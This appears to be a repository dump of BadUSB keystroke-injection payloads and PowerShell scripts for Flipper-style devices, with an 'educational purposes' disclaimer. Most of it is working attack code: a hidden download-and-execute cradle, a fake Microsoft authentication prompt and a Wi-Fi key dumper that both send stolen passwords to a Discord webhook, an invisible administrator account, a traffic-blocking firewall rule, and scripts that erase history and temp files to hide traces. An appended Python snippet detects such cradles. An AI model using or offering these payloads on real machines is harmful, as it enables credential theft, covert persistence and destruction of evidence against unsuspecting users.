├── BadUSB ├── payload_uploader │ ├── Dropbox import tuto │ │ └── README.MD │ ├── payload_uploader.txt │ └── README.md ├── Get-UserPassword │ ├── Get-UserPassword.txt │ └── Get-UserPassword.ps1 ├── Get-WifiPasswords-to-DiscordWebhook │ ├── Get-WifiPasswords-to-DiscordWebhook.txt │ ├── README.MD │ └── Get-WifiPasswords-to-DiscordWebhook.ps1 ├── Block-NetworkConnection │ └── Block-NetworkConnection.txt └── Add-Invisible-Admin-Account │ ├── Add-Invisible-Admin-Account.txt │ └── Add-Invisible-Admin-Account.ps1 └── README.md /BadUSB/payload_uploader/Dropbox import tuto/README.MD: -------------------------------------------------------------------------------- 1 | # Steps to have dropbox link for the uploader🐬 2 | 1. Connect to https://www.dropbox.com/login or create an account 3 | 2. Click on Import Button and import you .PS1 file 4 | 3. When your .PS1 file is uploaded select it & click on "Copy Link" 5 | 4. You will have an url like this https://www.dropbox.com/s/mq96dsiofzgdsq/MyPowershellfile.ps1?dl=0 6 | 5. Change it to (?dl=1 at the end of the url) 7 | https://www.dropbox.com/s/mq96dsiofzgdsq/MyPowershellfile.ps1?dl=1 8 | 6. 
Now, you can use this link in your BadUsb payload (.txt file) -------------------------------------------------------------------------------- /BadUSB/payload_uploader/payload_uploader.txt: -------------------------------------------------------------------------------- 1 | REM Title: Payload Uploader 2 | REM 3 | REM Author: Kira_ 4 | REM 5 | REM Description: This payload will download from dropbox & launch your script payload 6 | REM 7 | REM Remember to replace the link with your link for the intended file to download 8 | REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly 9 | REM 10 | REM 11 | GUI r 12 | DELAY 500 13 | STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl 14 | ENTER -------------------------------------------------------------------------------- /BadUSB/Get-UserPassword/Get-UserPassword.txt: -------------------------------------------------------------------------------- 1 | REM Title: Payload Uploader 2 | REM 3 | REM Author: Kira_ 4 | REM 5 | REM Description: This payload will download from dropbox & launch your script payload 6 | REM 7 | REM Remember to replace the link with your link for the intended file to download 8 | REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly 9 | REM 10 | REM 11 | GUI r 12 | DELAY 500 13 | STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://www.dropbox.com/s/yourshare_url?dl=1 -o "c:\windows\temp\your_script_name.ps1"; invoke-expression "c:\windows\temp\your_script_name.ps1" 14 | ENTER -------------------------------------------------------------------------------- /BadUSB/Get-WifiPasswords-to-DiscordWebhook/Get-WifiPasswords-to-DiscordWebhook.txt: -------------------------------------------------------------------------------- 1 | REM Title: Payload Uploader 2 | REM 3 | REM Author: Kira_ 4 | REM 5 | REM Description: This payload 
will download from dropbox & launch your script payload 6 | REM 7 | REM Remember to replace the link with your link for the intended file to download 8 | REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly 9 | REM 10 | REM 11 | GUI r 12 | DELAY 500 13 | STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://www.dropbox.com/s/yourshare_url?dl=1 -o "c:\windows\temp\your_script_name.ps1"; invoke-expression "c:\windows\temp\your_script_name.ps1" 14 | ENTER -------------------------------------------------------------------------------- /BadUSB/Block-NetworkConnection/Block-NetworkConnection.txt: -------------------------------------------------------------------------------- 1 | REM Title: Block All Trafic 2 | REM 3 | REM Author: Kira_ 4 | REM 5 | REM Description: This payload will Block all inbound & outbound connexion on user device 6 | REM 7 | REM Start powershell as admin 8 | GUI r 9 | DELAY 500 10 | STRING powershell.exe Start-Process powershell -Verb runAs 11 | DELAY 500 12 | ENTER 13 | DELAY 2000 14 | LEFT 15 | DELAY 500 16 | ENTER 17 | DELAY 500 18 | STRING New-NetFirewallRule -DisplayName "Block All Connections" -Direction Outbound -Action Block;New-NetFirewallRule -DisplayName "Block All Connections" -Direction inbound -Action Block 19 | DELAY 500 20 | ENTER 21 | DELAY 500 22 | STRING exit 23 | DELAY 500 24 | ENTER 25 | 26 | -------------------------------------------------------------------------------- /BadUSB/Get-WifiPasswords-to-DiscordWebhook/README.MD: -------------------------------------------------------------------------------- 1 |

Wifi Stealer V2 with Exfiltration via Discord Webhook


7 | 8 | **This payload will retrieve the different wifi networks saved on the computer as well as the security keys registered. 9 | It will then send via a discord webhook the different information retrieved.** 10 | 11 | ------------ 12 | 13 | ## Features 14 | Note: the code needs to be UTF8-BOM encoded 15 | - It can manage the output of the netsh command if the output is in French or English 16 | - Output is sent in nice Formatted Embed 17 | - Takes into account Wi-Fi without a security key 18 | 19 | ![output](https://i.imgur.com/p1vBYqW.jpg "output") 20 | -------------------------------------------------------------------------------- /BadUSB/Add-Invisible-Admin-Account/Add-Invisible-Admin-Account.txt: -------------------------------------------------------------------------------- 1 | REM Title: Payload Uploader 2 | REM 3 | REM Author: Kira_ 4 | REM 5 | REM Description: This payload will download from dropbox & launch your script payload 6 | REM 7 | REM Remember to replace the link with your link for the intended file to download 8 | REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly 9 | REM 10 | REM 11 | REM Start powershell as admin 12 | GUI r 13 | DELAY 500 14 | STRING powershell.exe Start-Process powershell -Verb runAs 15 | DELAY 500 16 | ENTER 17 | DELAY 2000 18 | LEFT 19 | DELAY 500 20 | ENTER 21 | DELAY 500 22 | STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr "DROPBOX_URL" -Outfile "c:\windows\temp\Add-Invisible-Admin-Account.ps1"; invoke-expression "c:\windows\temp\Add-Invisible-Admin-Account.ps1" 23 | DELAY 500 24 | ENTER 25 | 26 | -------------------------------------------------------------------------------- /BadUSB/payload_uploader/README.md: -------------------------------------------------------------------------------- 1 | # Uploader parameters and description 2 | 3 | | Parameter | Description | 4 | | ----------------- | ----------- | 5 | | `powershell` | Command to launch Windows 
PowerShell | 6 | | `-w h` | Sets the terminal width to a maximum height | 7 | | `-NoP` | Disables script protection | 8 | | `-NonI` | Disables user-interface interactions | 9 | | `-Exec Bypass` | Allows unsigned scripts to run | 10 | | `iwr` | Alias for Invoke-WebRequest, used to download the file | 11 | | `https://www.dropbox.com/s/yourshare_url?dl=1` | URL from which the script file is downloaded | 12 | | `-o "c:\windows\temp\your_script_name.ps1"` | Specifies where the script file is to be saved | 13 | | `invoke-expression` | Runs a PowerShell script | 14 | | `"c:\windows\temp\your_script_name.ps1"` | Location of the downloaded script file | 15 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 |


13 | 14 | >DISCLAIMER: This repository is for educational purposes only and is not intended for real-world usage. The creators of this repository 15 | are not responsible for any harm or damage that may occur as a result of using the information or code provided in this repository. 16 | By accessing and using this repository, you acknowledge and agree that you do so at your own risk. 17 | 18 | 19 |


22 | -------------------------------------------------------------------------------- /BadUSB/Add-Invisible-Admin-Account/Add-Invisible-Admin-Account.ps1: -------------------------------------------------------------------------------- 1 | # Create a new user 2 | net user microsoft microsoft /add 3 | 4 | #Get local admin group name 5 | $LocalAdminGroupName = gwmi win32_group -filter "LocalAccount = $TRUE And SID = 'S-1-5-32-544'" | select -expand name 6 | 7 | # Add this user to the localgroup "Administrators" 8 | net localgroup $LocalAdminGroupName microsoft /add 9 | 10 | # Make this user invisible 11 | reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v microsoft /t REG_DWORD /d 0 /f 12 | 13 | # Set interactive logon on: Don't display last signed-in to allow you to connect to invisible account 14 | New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name dontdisplaylastusername -PropertyType DWORD -Value 1 -Force 15 | 16 | # empty temp folder 17 | rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue 18 | 19 | # delete run box history 20 | reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f 21 | 22 | # Delete powershell history 23 | Remove-Item (Get-PSreadlineOption).HistorySavePath 24 | 25 | # Empty recycle bin 26 | Clear-RecycleBin -Force -ErrorAction SilentlyContinue 27 | -------------------------------------------------------------------------------- /BadUSB/Get-WifiPasswords-to-DiscordWebhook/Get-WifiPasswords-to-DiscordWebhook.ps1: -------------------------------------------------------------------------------- 1 | #Webhook URL 2 | $webhookUri = "YOUR DISCORD WEBHOOK" 3 | 4 | #Get List of SSIDS 5 | $SSIDS = (netsh wlan show profiles | Select-String ': ' ) -replace ".*:\s+" | Where-Object {$_ -ne ""} 6 | 7 | #initiate Embed Array var 8 | [System.Collections.ArrayList]$embedArray = @() 9 | $description = "" 10 | $color = 
"4289797" 11 | 12 | #A loop to get password for each SSID 13 | $WifiInfo = foreach($SSID in $SSIDS) { 14 | 15 | # Check if output is in French or English 16 | $output = netsh wlan show profiles name="$SSID" key=clear 17 | 18 | #Embed Title 19 | $title = "EXFILTRATED FROM COMPUTER : " + $env:computername 20 | 21 | #IF Output of netsh is french 22 | if ($output -match "Paramètres de sécurité"){ 23 | 24 | #IF output have a password key 25 | if ($output -match "Contenu de la clé" ){ 26 | $Password = ($output | Select-String 'Contenu de la clé') -replace ".*:\s+" 27 | $description = "**Network:** " + $SSID + " 28 | **Password:** " + $Password 29 | }else{ 30 | $description = "**Network:** " + $SSID + " 31 | **Password:** No Password" 32 | } 33 | 34 | } 35 | 36 | 37 | #IF Output of netsh is English 38 | if ($output -match "Security settings"){ 39 | 40 | #IF output have a password key 41 | if ($output -match "Key Content"){ 42 | $Password = ($output | Select-String 'Key Content') -replace ".*:\s+" 43 | $description = "**Network:** " + $SSID + " 44 | **Password:** " + $Password 45 | }else{ 46 | $description = "**Network:** " + $SSID + " 47 | **Password:** No Password" 48 | } 49 | 50 | } 51 | 52 | #Create Embed Object 53 | $embedObject = [PSCustomObject]@{ 54 | color = $color 55 | title = $title 56 | description = $description 57 | } 58 | 59 | #Add Object to Array 60 | $embedArray.Add($embedObject) 61 | 62 | #Creating the embed 63 | $payload = [PSCustomObject]@{ 64 | embeds = $embedArray 65 | } 66 | 67 | 68 | 69 | } 70 | #Send data using REST method 71 | Invoke-RestMethod -Uri $webHookUri -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json' -------------------------------------------------------------------------------- /BadUSB/Get-UserPassword/Get-UserPassword.ps1: -------------------------------------------------------------------------------- 1 | 2 | <# 3 | .SYNOPSIS 4 | This script is meant to trick your target into sharing their 
credentials through a fake authentication pop up message 5 | original script by jakobi : https://github.com/I-Am-Jakoby/Flipper-Zero-BadUSB/tree/main/Payloads/Flip-Credz-Plz 6 | Reworked by Kira 7 | .DESCRIPTION 8 | A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" 9 | This will be followed by a fake authentication ui prompt. 10 | If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up 11 | Once the target enters their credentials their information will be uploaded to Discord webhook for collection 12 | 13 | 14 | #> 15 | 16 | #------------------------------------------------------------------------------------------------------------------------------------ 17 | 18 | $dc = "YOUR DISCORD WEBHOOK" 19 | 20 | #------------------------------------------------------------------------------------------------------------------------------------ 21 | 22 | 23 | #initiate Embed Array var 24 | [System.Collections.ArrayList]$embedArray = @() 25 | $description = "" 26 | $color = "4289797" 27 | 28 | #------------------------------------------------------------------------------------------------------------------------------------ 29 | 30 | <# 31 | 32 | .NOTES 33 | This is to generate the ui.prompt you will use to harvest their credentials 34 | #> 35 | 36 | function Get-Creds { 37 | $form = $null 38 | 39 | while ($form -eq $null) 40 | { 41 | $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); 42 | $cred.getnetworkcredential().password 43 | 44 | if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) 45 | { 46 | Add-Type -AssemblyName PresentationCore,PresentationFramework 47 | $msgBody = "Credentials cannot be empty!" 
48 | $msgTitle = "Error" 49 | $msgButton = 'Ok' 50 | $msgImage = 'Stop' 51 | $Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage) 52 | Write-Host "The user clicked: $Result" 53 | $form = $null 54 | } 55 | 56 | else{ 57 | $creds = $cred.GetNetworkCredential() | fl 58 | return $creds 59 | } 60 | } 61 | 62 | } 63 | #---------------------------------------------------------------------------------------------------- 64 | 65 | <# 66 | 67 | .NOTES 68 | This is to pause the script until a mouse movement is detected 69 | #> 70 | function Pause-Script{ 71 | Add-Type -AssemblyName System.Windows.Forms 72 | $originalPOS = [System.Windows.Forms.Cursor]::Position.X 73 | $o=New-Object -ComObject WScript.Shell 74 | 75 | while (1) { 76 | $pauseTime = 3 77 | if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ 78 | break 79 | } 80 | else { 81 | $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime 82 | } 83 | } 84 | } 85 | #---------------------------------------------------------------------------------------------------- 86 | 87 | # This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off 88 | function Caps-Off { 89 | Add-Type -AssemblyName System.Windows.Forms 90 | $caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') 91 | 92 | #If true, toggle CapsLock key, to ensure that the script doesn't fail 93 | if ($caps -eq $true){ 94 | 95 | $key = New-Object -ComObject WScript.Shell 96 | $key.SendKeys('{CapsLock}') 97 | } 98 | } 99 | #---------------------------------------------------------------------------------------------------- 100 | 101 | <# 102 | 103 | .NOTES 104 | This is to call the function to pause the script until a mouse movement is detected then activate the pop-up 105 | #> 106 | Pause-Script 107 | Caps-Off 108 | Add-Type -AssemblyName PresentationCore,PresentationFramework 109 | $msgBody = "Please authenticate your Microsoft Account." 
110 | $msgTitle = "Authentication Required" 111 | $msgButton = 'Ok' 112 | $msgImage = 'Warning' 113 | $Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage) 114 | Write-Host "The user clicked: $Result" 115 | $creds = Get-Creds 116 | 117 | #------------------------------------------------------------------------------------------------------------------------------------ 118 | 119 | #------------------------------------------------------------------------------------------------------------------------------------ 120 | 121 | 122 | $title = "EXFILTRATED FROM COMPUTER : " + $env:computername 123 | $description = "**User:** " + [Environment]::UserDomainName+'\'+[Environment]::UserName + " 124 | **Password:** " + $creds[0] 125 | 126 | 127 | #Create Embed Object 128 | $embedObject = [PSCustomObject]@{ 129 | color = $color 130 | title = $title 131 | description = $description 132 | } 133 | 134 | #Add Object to Array 135 | $embedArray.Add($embedObject) 136 | 137 | #Creating the embed 138 | $payload = [PSCustomObject]@{ 139 | embeds = $embedArray 140 | } 141 | 142 | #Send data using REST method 143 | Invoke-RestMethod -Uri $dc -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json' 144 | 145 | 146 | #------------------------------------------------------------------------------------------------------------------------------------ 147 | 148 | <# 149 | 150 | .NOTES 151 | This is to clean up behind you and remove any evidence to prove you were there 152 | 153 | #> 154 | # Delete contents of Temp folder 155 | try { 156 | rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue 157 | rm c:\windows\temp\* -r -Force -ErrorAction SilentlyContinue 158 | } catch { 159 | Write-Error "Error deleting contents of Temp folder: $($_.Exception.Message)" 160 | } 161 | 162 | # Delete run box history 163 | try { 164 | reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f 165 | } catch { 166 | 
Write-Error "Error deleting run box history: $($_.Exception.Message)" 167 | } 168 | 169 | # Delete powershell history 170 | try { 171 | Remove-Item (Get-PSreadlineOption).HistorySavePath 172 | } catch { 173 | Write-Error "Error deleting PowerShell history: $($_.Exception.Message)" 174 | } 175 | 176 | # Deletes contents of recycle bin 177 | try { 178 | Clear-RecycleBin -Force -ErrorAction SilentlyContinue 179 | } catch { 180 | Write-Error "Error deleting contents of recycle bin: $($_.Exception.Message)" 181 | } 182 | exit 183 | 184 | 185 | --------------------------------------------------------------------------------
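
Added example, not part of this repository: a defender-side check for the uploader one-liner documented in the parameter table. It expands the abbreviated host switches (`-w h` is `-WindowStyle Hidden`, `-NoP` is `-NoProfile`, `-NonI` is `-NonInteractive`, `-Exec Bypass` is `-ExecutionPolicy Bypass`) and flags process command lines that combine them with a download and `invoke-expression`. The prefix table is a simplified model of how powershell.exe matches switches, and the sample command lines are constructed.

```python
import re

# Simplified model of powershell.exe switch prefix matching (assumption, not its parser).
SWITCHES = {"windowstyle": "w", "noprofile": "nop",
            "noninteractive": "noni", "executionpolicy": "ex"}
ALIASES = {"ep": "executionpolicy"}
TAKES_VALUE = {"windowstyle", "executionpolicy"}
HOSTS = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}
DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)

def host_switches(cmdline):
    """Expand abbreviated host switches that precede the command text."""
    tokens = cmdline.split()
    if not tokens or tokens[0].strip('"').lower().rsplit("\\", 1)[-1] not in HOSTS:
        return None  # not a PowerShell host process
    found, i = {}, 1
    while i < len(tokens) and tokens[i].startswith("-"):
        name = tokens[i][1:].lower()
        canon = ALIASES.get(name) or next(
            (full for full, short in SWITCHES.items()
             if full.startswith(name) and name.startswith(short)), None)
        if canon in TAKES_VALUE and i + 1 < len(tokens):
            found[canon] = tokens[i + 1].lower()
            i += 1  # skip the value token
        elif canon:
            found[canon] = ""
        i += 1
    return found

def assess(cmdline):
    """Return the indicators present in one process command line."""
    sw = host_switches(cmdline)
    if sw is None:
        return []
    hits = []
    if sw.get("windowstyle") and "hidden".startswith(sw["windowstyle"]):
        hits.append("hidden-window")
    if sw.get("executionpolicy") in ("bypass", "unrestricted"):
        hits.append("policy-bypass")
    hits += [n for n in ("noprofile", "noninteractive") if n in sw]
    hits += [label for label, rx in (("download", DOWNLOAD), ("execute", EXECUTE))
             if rx.search(cmdline)]
    return hits

def is_download_cradle(cmdline):
    """Alert when a hidden or policy-bypassing host both downloads and executes."""
    hits = set(assess(cmdline))
    return {"download", "execute"} <= hits and bool(hits & {"hidden-window", "policy-bypass"})

# Constructed command lines, as process-creation logging might record them.
SAMPLES = [
    "powershell -w h -NoP -NonI -Exec Bypass $pl = iwr "
    "https://www.dropbox.com/s/yourshare_url?dl=1; invoke-expression $pl",
    "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
    "powershell.exe Start-Process powershell -Verb runAs",
]
```

Matching on the expanded switch names rather than literal strings keeps the rule from being sidestepped by a different abbreviation of the same switch.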